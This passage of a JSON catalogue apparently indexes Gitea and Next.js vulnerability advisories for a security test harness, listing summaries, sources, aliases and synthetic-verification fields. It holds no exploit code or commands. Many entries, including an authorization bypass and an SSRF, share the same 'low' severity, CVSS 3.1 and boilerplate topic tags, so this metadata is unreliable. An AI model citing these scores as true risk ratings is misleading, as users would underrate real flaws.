"refs": []
}
},
"gitea--CVE-2026-20800": {
"canonical_id": "gitea--CVE-2026-20800",
"title": "Gitea improperly exposes issue and pull request titles in code.gitea.io/gitea",
"summary": "Gitea improperly exposes issue and pull request titles in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:54.012782Z",
"official_source_url": "https://github.com/advisories/GHSA-2vgv-hgv4-22mh",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20800",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/67e75f30a83d2523cedc37ad7b03bcba66947833",
"https://github.com/go-gitea/gitea/pull/36339",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20800",
"CVE-2026-20800",
"GHSA-2vgv-hgv4-22mh",
"GHSA-g54m-9f6g-wj7q",
"GO-2026-4362"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20883": {
"canonical_id": "gitea--CVE-2026-20883",
"title": "Gitea improperly exposes issue titles and repository names through previously started stopwatches in code.gitea.io/gitea",
"summary": "Gitea improperly exposes issue titles and repository names through previously started stopwatches in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:54.692700Z",
"official_source_url": "https://github.com/advisories/GHSA-j8xr-c56q-m8jj",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20883",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/95ea2df00a70176c516b12f3cfee8c84a310280f",
"https://github.com/go-gitea/gitea/pull/36340",
"https://github.com/go-gitea/gitea/pull/36368",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20883",
"CVE-2026-20883",
"GHSA-644v-xv3j-xgqg",
"GHSA-j8xr-c56q-m8jj",
"GO-2026-4368"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20888": {
"canonical_id": "gitea--CVE-2026-20888",
"title": "Gitea does not properly verify authorization when canceling scheduled auto-merges via the web interface in code.gitea.io/gitea",
"summary": "Gitea does not properly verify authorization when canceling scheduled auto-merges via the web interface in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:56.025932Z",
"official_source_url": "https://github.com/advisories/GHSA-9cgq-wp42-4rpq",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20888",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/pull/36341",
"https://github.com/go-gitea/gitea/pull/36356",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20888",
"CVE-2026-20888",
"GHSA-9cgq-wp42-4rpq",
"GHSA-ccq9-c5hv-cf64",
"GO-2026-4366"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20897": {
"canonical_id": "gitea--CVE-2026-20897",
"title": "Gitea does not properly validate repository ownership when deleting Git LFS locks in code.gitea.io/gitea",
"summary": "Gitea does not properly validate repository ownership when deleting Git LFS locks in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:55.339967Z",
"official_source_url": "https://github.com/advisories/GHSA-393c-qgvj-3xph",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20897",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/da036f3f35ca830b22cf4480912ed261303b798f",
"https://github.com/go-gitea/gitea/pull/36344",
"https://github.com/go-gitea/gitea/pull/36349",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20897",
"CVE-2026-20897",
"GHSA-393c-qgvj-3xph",
"GHSA-rrq5-r9h5-pc7c",
"GO-2026-4363"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20904": {
"canonical_id": "gitea--CVE-2026-20904",
"title": "Gitea does not properly validate ownership when toggling OpenID URI visibility in code.gitea.io/gitea",
"summary": "Gitea does not properly validate ownership when toggling OpenID URI visibility in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:54.244003Z",
"official_source_url": "https://github.com/advisories/GHSA-qqgv-v353-cv8p",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20904",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/ed5720af2ac94d74f822721c05b42b6148ff9c22",
"https://github.com/go-gitea/gitea/pull/36346",
"https://github.com/go-gitea/gitea/pull/36361",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20904",
"CVE-2026-20904",
"GHSA-jrpc-w85r-hgqx",
"GHSA-qqgv-v353-cv8p",
"GO-2026-4369"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20912": {
"canonical_id": "gitea--CVE-2026-20912",
"title": "Gitea does not properly validate repository ownership when linking attachments to releases in code.gitea.io/gitea",
"summary": "Gitea does not properly validate repository ownership when linking attachments to releases in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:55.747880Z",
"official_source_url": "https://github.com/advisories/GHSA-4xx9-vc8v-87hv",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20912",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/fbea2c68e8df11cfa94e8ead913b79946780ed30",
"https://github.com/go-gitea/gitea/pull/36320",
"https://github.com/go-gitea/gitea/pull/36355",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20912",
"CVE-2026-20912",
"GHSA-4xx9-vc8v-87hv",
"GHSA-vfmv-f93v-37mw",
"GO-2026-4364"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2020-5284": {
"canonical_id": "nextjs--CVE-2020-5284",
"title": "Directory Traversal in Next.js",
"summary": "### Impact\n\n- **Not affected**: Deployments on ZEIT Now v2 ([https://zeit.co](https://zeit.co/)) are not affected\n- **Not affected**: Deployments using the `serverless` target\n- **Not affected**: Deployments using `next export`\n- **Affected**: Users of Next.js below 9.3.2\n\nWe recommend everyone to upgrade regardless of whether you can reproduce the issue or not.\n\n### Patches\n\nhttps://github.com/zeit/next.js/releases/tag/v9.3.2\n\n### References\n\nhttps://github.com/zeit/next.js/releases/tag/v9.3.2",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2020-03-30T20:40:50Z",
"updated_at": "2025-09-26T17:49:56Z",
"official_source_url": "https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-5284",
"https://github.com/zeit/next.js/releases/tag/v9.3.2",
"https://www.npmjs.com/advisories/1503"
],
"aliases": [
"CVE-2020-5284",
"GHSA-fq77-7p7r-83rj"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"path-traversal-guard"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2021-37699": {
"canonical_id": "nextjs--CVE-2021-37699",
"title": "Open Redirect in Next.js",
"summary": "Next.js is an open source website development framework to be used with the React library. In affected versions, specially encoded paths could be used when `pages/_error.js` was statically generated, allowing an open redirect to occur to an external site. In general, this redirect does not directly harm users although it can allow for phishing attacks by redirecting to an attacker's domain from a trusted domain.\n\n### Impact\n\n- **Affected:** Users of Next.js between `10.0.5` and `10.2.0`\n- **Affected:** Users of Next.js between `11.0.0` and `11.0.1` using `pages/_error.js` without `getInitialProps`\n- **Affected:** Users of Next.js between `11.0.0` and `11.0.1` using `pages/_error.js` and `next export`\n- **Not affected**: Deployments on Vercel ([vercel.com](https://vercel.com)) are not affected\n- **Not affected:** Deployments **with** `pages/404.js`\n- Note that versions of the `next` npm package prior to 0.9.9 hosted a different utility (0.4.1 being the latest version of that codebase), and this advisory does not apply to those versions.\n\nWe recommend upgrading to the latest version of Next.js to improve the overall security of your application.\n\n### Patches\n\nhttps://github.com/vercel/next.js/releases/tag/v11.1.0",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2021-08-12T14:51:14Z",
"updated_at": "2026-03-13T22:00:08.038285Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-vxf5-wxwp-m7g9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-37699",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v11.1.0"
],
"aliases": [
"CVE-2021-37699",
"GHSA-vxf5-wxwp-m7g9"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2021-39178": {
"canonical_id": "nextjs--CVE-2021-39178",
"title": "XSS in Image Optimization API for Next.js",
"summary": "### Impact\n- **Affected:** All of the following must be true to be affected\n - Next.js between version 10.0.0 and 11.1.0\n - The `next.config.js` file has [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) array assigned\n - The image host assigned in [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) allows user-provided SVG\n- **Not affected**: The `next.config.js` file has [`images.loader`](https://nextjs.org/docs/basic-features/image-optimization#loader) assigned to something other than default\n- **Not affected**: Deployments on [Vercel](https://vercel.com) are not affected\n\n### Patches\n[Next.js v11.1.1](https://github.com/vercel/next.js/releases/tag/v11.1.1)\n\n",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2021-09-01T18:24:22Z",
"updated_at": "2026-03-13T22:00:20.154452Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-9gr3-7897-pp7m",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-39178",
"https://github.com/vercel/next.js/pull/28620",
"https://github.com/vercel/next.js/commit/7afc97c5744b38bdf36aa7f87625f438224688aa",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v11.1.1"
],
"aliases": [
"CVE-2021-39178",
"GHSA-9gr3-7897-pp7m"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"xss-output-encoding"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2021-43803": {
"canonical_id": "nextjs--CVE-2021-43803",
"title": "Unexpected server crash in Next.js.",
"summary": "Next.js is a React framework. In versions of Next.js prior to 12.0.5 or 11.1.3, invalid or malformed URLs could lead to a server crash. In order to be affected by this issue, the deployment must use Next.js versions above 11.1.0 and below 12.0.5, Node.js above 15.0.0, and `next start` or a custom server. Deployments on Vercel are not affected, along with similar environments where invalid requests are filtered before reaching Next.js. Versions 12.0.5 and 11.1.3 contain patches for this issue. Note that versions of the `next` package prior to 0.9.9 hosted a different utility (0.4.1 being the latest version of that codebase), and this advisory does not apply to those versions.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2021-12-07T21:12:09Z",
"updated_at": "2026-03-13T22:00:36.554552Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-25mp-g6fv-mqxx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-43803",
"https://github.com/vercel/next.js/pull/32080",
"https://github.com/vercel/next.js/commit/6d98b4fb4315dec1badecf0e9bdc212a4272b264",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v11.1.3",
"https://github.com/vercel/next.js/releases/v12.0.5"
],
"aliases": [
"CVE-2021-43803",
"GHSA-25mp-g6fv-mqxx"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2024-34351": {
"canonical_id": "nextjs--CVE-2024-34351",
"title": "Next.js Server-Side Request Forgery in Server Actions",
"summary": "### Impact\nA Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.\n\n#### Prerequisites\n* Next.js (`<14.1.1`) is running in a self-hosted* manner.\n* The Next.js application makes use of Server Actions.\n* The Server Action performs a redirect to a relative path which starts with a `/`.\n\n\\* Many hosting providers (including Vercel) route requests based on the Host header, so we do not believe that this vulnerability affects any Next.js applications where routing is done in this manner.\n\n### Patches\nThis vulnerability was patched in [#62561](https://github.com/vercel/next.js/pull/62561) and fixed in Next.js `14.1.1`.\n \n### Workarounds\nThere are no official workarounds for this vulnerability. We recommend upgrading to Next.js `14.1.1`.\n\n### Credit\nVercel and the Next.js team thank Assetnote for responsibly disclosing this issue to us, and for working with us to verify the fix. Thanks to:\n\nAdam Kues - Assetnote\nShubham Shah - Assetnote",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-05-09T21:18:57Z",
"updated_at": "2026-02-04T03:32:36.434669Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-34351",
"https://github.com/vercel/next.js/pull/62561",
"https://github.com/vercel/next.js/commit/8f7a6ca7d21a97bc9f7a1bbe10427b5ad74b9085",
"https://github.com/vercel/next.js"
],
"aliases": [
"CVE-2024-34351",
"GHSA-fr5h-rqp8-mj6g"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"ssrf-url-validation"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2024-46982": {
"canonical_id": "nextjs--CVE-2024-46982",
"title": "Next.js Cache Poisoning",
"summary": "### Impact\n\nBy sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. \n\nTo be potentially affected all of the following must apply: \n\n- Next.js between 13.5.1 and 14.2.9\n- Using pages router\n- Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`\n\nThe below configurations are unaffected:\n\n- Deployments using only app router\n- Deployments on [Vercel](https://vercel.com/) are not affected\n\n\n### Patches\n\nThis vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not.\n\n### Workarounds\n\nThere are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.\n\n#### Credits\n\n- Allam Rachid (zhero_)\n- Henry Chen",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-09-17T21:58:09Z",
"updated_at": "2026-02-04T03:45:33.402195Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-46982",
"https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3",
"https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda",
"https://github.com/vercel/next.js"
],
"aliases": [
"CVE-2024-46982",
"GHSA-gp8f-8m3g-qvj9"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2024-47831": {
"canonical_id": "nextjs--CVE-2024-47831",
"title": "Denial of Service condition in Next.js image optimization",
"summary": "### Impact\nThe image optimization feature of Next.js contained a vulnerability which allowed for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption.\n\n**Not affected:**\n- The `next.config.js` file is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value.\n- The Next.js application is hosted on Vercel. \n\n### Patches\nThis issue was fully patched in Next.js `14.2.7`. We recommend that users upgrade to at least this version.\n\n### Workarounds\nEnsure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.\n\n#### Credits\nBrandon Dahler (brandondahler), AWS\nDimitrios Vlastaras",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-10-14T19:45:21Z",
"updated_at": "2026-02-04T03:25:43.295558Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-47831",
"https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a",
"https://github.com/vercel/next.js"
],
"aliases": [
"CVE-2024-47831",
"GHSA-g77x-44xx-532m"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2024-51479": {
"canonical_id": "nextjs--CVE-2024-51479",
"title": "Next.js authorization bypass vulnerability",
"summary": "### Impact\nIf a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed.\n\n### Patches\nThis issue was patched in Next.js `14.2.15` and later.\n\nIf your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version.\n\n### Workarounds\nThere are no official workarounds for this vulnerability.\n\n#### Credits\nWe'd like to thank [tyage](http://github.com/tyage) (GMO CyberSecurity by IERAE) for responsible disclosure of this issue.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-12-17T15:09:06Z",
"updated_at": "2025-09-10T21:12:24Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-51479",
"https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v14.2.15"
],
"aliases": [
"CVE-2024-51479",
"GHSA-7gfc-8cq8-jh5f"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2024-56332": {
"canonical_id": "nextjs--CVE-2024-56332",
"title": "Next.js Allows a Denial of Service (DoS) with Server Actions",
"summary": "### Impact\nA Denial of Service (DoS) attack allows attackers to construct requests that leave requests to Server Actions hanging until the hosting provider cancels the function execution.\n\n_Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time._\n\nDeployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing.\n\nThis is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations for those, then this vulnerability is novel.\n\nThis vulnerability affects only Next.js deployments using Server Actions.\n\n### Patches\n\nThis vulnerability was resolved in Next.js 14.2.21, 15.1.2, and 13.5.8. We recommend that users upgrade to a safe version.\n\n### Workarounds\n\nThere are no official workarounds for this vulnerability.\n\n### Credits\n\nThanks to the PackDraw team for responsibly disclosing this vulnerability.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-01-03T20:19:29Z",
"updated_at": "2026-02-04T04:36:04.252972Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-56332",
"https://github.com/vercel/next.js"
],
"aliases": [
"CVE-2024-56332",
"GHSA-7m27-7ghc-44w9"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-30218": {
"canonical_id": "nextjs--CVE-2025-30218",
"title": "Next.js may leak x-middleware-subrequest-id to external hosts",
"summary": "## Summary\nIn the process of remediating [CVE-2025-29927](https://github.com/advisories/GHSA-f82v-jwr5-mffw), we looked at other possible exploits of Middleware. We independently verified this low severity vulnerability in parallel with two reports from independent researchers.\n\nLearn more [here](https://vercel.com/changelog/cve-2025-30218-5DREmEH765PoeAsrNNQj3O).\n\n## Credit\n\nThank you to Jinseo Kim [kjsman](https://hackerone.com/kjsman?type=user) and [RyotaK](https://hackerone.com/ryotak?type=user) (GMO Flatt Security Inc.) with [takumi-san.ai](https://takumi-san.ai) for the responsible disclosure. These researchers were awarded as part of our bug bounty program.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-04-02T22:35:37Z",
"updated_at": "2025-10-13T15:35:50Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-223j-4rm8-mrmf",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-30218",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-30218-5DREmEH765PoeAsrNNQj3O"
],
"aliases": [
"CVE-2025-30218",
"GHSA-223j-4rm8-mrmf"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-32421": {
"canonical_id": "nextjs--CVE-2025-32421",
"title": "Next.js Race Condition to Cache Poisoning",
"summary": "**Summary** \nWe received a responsible disclosure from Allam Rachid (zhero) for a low-severity race-condition vulnerability in Next.js. This issue only affects the **Pages Router** under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML.\n\n[Learn more here](https://vercel.com/changelog/cve-2025-32421)\n\n**Credit** \nThank you to **Allam Rachid (zhero)** for the responsible disclosure. This research was rewarded as part of our bug bounty program.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-05-15T14:12:26Z",
"updated_at": "2025-09-26T17:48:29Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-32421",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-32421"
],
"aliases": [
"CVE-2025-32421",
"GHSA-qpjv-v59x-3qc4"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-48068": {
"canonical_id": "nextjs--CVE-2025-48068",
"title": "Information exposure in Next.js dev server due to lack of origin verification",
"summary": "## Summary\n\nA low-severity vulnerability in **Next.js** has been fixed in **version 15.2.2**. This issue may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while `npm run dev` is active.\n\nBecause the mitigation is potentially a breaking change for some development setups, to opt-in to the fix, you must configure `allowedDevOrigins` in your next config after upgrading to a patched version. [Learn more](https://nextjs.org/docs/app/api-reference/config/next-config-js/allowedDevOrigins).\n\nLearn more: https://vercel.com/changelog/cve-2025-48068\n\n## Credit\n\nThanks to [sapphi-red](https://github.com/sapphi-red) and [Radman Siddiki](https://github.com/R4356th) for responsibly disclosing this issue.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-05-28T21:52:13Z",
"updated_at": "2025-06-13T14:41:21Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-48068",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-48068"
],
"aliases": [
"CVE-2025-48068",
"GHSA-3h52-269p-cp9r"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-49005": {
"canonical_id": "nextjs--CVE-2025-49005",
"title": "Next.js has a Cache poisoning vulnerability due to omission of the Vary header",
"summary": "### Summary\n\nA cache poisoning issue in **Next.js App Router >=15.3.0 and < 15.3.3** may have allowed RSC payloads to be cached and served in place of HTML, under specific conditions involving middleware and redirects. This issue has been fixed in **Next.js 15.3.3**.\n\nUsers on affected versions should **upgrade immediately** and **redeploy** to ensure proper caching behavior.\n\nMore details: [CVE-2025-49005](https://vercel.com/changelog/cve-2025-49005)",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-07-03T20:30:18Z",
"updated_at": "2026-02-04T02:37:18.974477Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-r2fc-ccr8-96c4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-49005",
"https://github.com/vercel/next.js/issues/79346",
"https://github.com/vercel/next.js/pull/79939",
"https://github.com/vercel/next.js/commit/ec202eccf05820b60c6126d6411fe16766ecc066",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v15.3.3",
